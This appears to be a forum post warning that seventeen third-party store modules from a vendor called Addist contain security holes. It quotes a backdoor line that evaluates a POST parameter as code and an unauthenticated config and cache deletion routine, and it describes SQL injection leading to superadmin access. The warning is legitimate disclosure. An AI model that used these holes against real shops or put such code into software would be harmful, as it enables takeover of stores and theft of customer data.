Modules:
Module_01
Module_02
Module_03
Module_04
Module_05
Module_06
Module_07
Module_08
Module_09
Module_10
Module_11
Module_12
Module_13
Module_14
Module_15
Module_16
Module_17
In the module files found:
1.
Code: Select all
@eval($this->request->post['command']);
If you have a modules from Addist, then get ftp access to your store is 5 seconds of time. Made this addict on purpose, or accidentally — doesn't matter. The fact that these modules were found to have nearly 1,000 owners of working shops.
2.
Code: Select all
if (!empty($this->request->get['deactivate']))
{
$this->cache->delete($this->request->get['deactivate']);
$this->config->remove($this->request->get['deactivate']);
}
3.
No escaping when writing to the database, and if appropriate, to compile the data, with this bug you can make a request to the database store for example to add user rights superadmin, well and there already to catch full access to the shop is not a problem.